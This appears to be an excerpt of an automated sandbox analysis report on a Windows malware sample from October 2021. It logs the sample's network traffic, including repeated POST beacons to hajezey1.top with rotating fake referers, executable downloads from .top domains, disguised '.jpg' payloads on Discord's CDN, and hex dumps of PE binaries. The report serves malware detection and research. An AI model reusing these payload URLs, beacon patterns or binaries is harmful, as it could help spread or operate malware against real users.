4c 01 05 00 00 29 52 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a6 07 00 00 c4 70 02 00 00 00 00 50 ac 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 1b 9f 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 aa 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 30 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 a5 07 00 00 10 00 00 00 a6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 69 74 6f 00 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 80 77 02 00 24 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:30:35 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49794 version: TLS 1.0
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rctoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cufneavefi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: hajezey1.top
              Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctxsek.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivcdxqts.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqtrcnnq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhvnsfthad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwdvnqc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rprqyk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjooem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfhoss.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgdpvqs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryqdxjurg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjrxemk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efeydlty.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glvslni.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbxuhdvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axwrxhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkannuwrja.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://naytoe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bggaruuq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcaielan.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sangssr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eyepud.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkvmgnfi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbdqtrry.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkaqxiicba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://taupwpt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blslkdmyqd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chucxho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://futucrxk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: hajezey1.top
              Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iyxlcdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayllaycsn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcwoodah.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtlkrwbu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohksryibbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aandk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbvoxgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhsdwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akpvscwiwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fftaocheul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqktie.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkhdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: hajezey1.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhnkknumd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: hajezey1.top
              Source: global trafficTCP traffic: 192.168.2.7:49818 -> 93.115.20.139:28978
              Source: C1B2.exe, 00000015.00000002.614812023.000000000156F000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: C1B2.exeString found in binary or memory: http://fontello.com
              Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
              Source: explorer.exe, 00000004.00000000.287991711.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: AdvancedRun.exe, AdvancedRun.exe, 0000001B.00000000.419935360.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
              Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
              Source: C1B2.exeString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg
              Source: unknownDNS traffic detected: queries for: xacokuo8.top
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_004070B4 HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
              Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
              Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
              Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/019cd02588367c4185228009642767b5fca228df HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
              Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/07191d3d9db3dbffa0d8f6d32b0cace6fdafa466 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
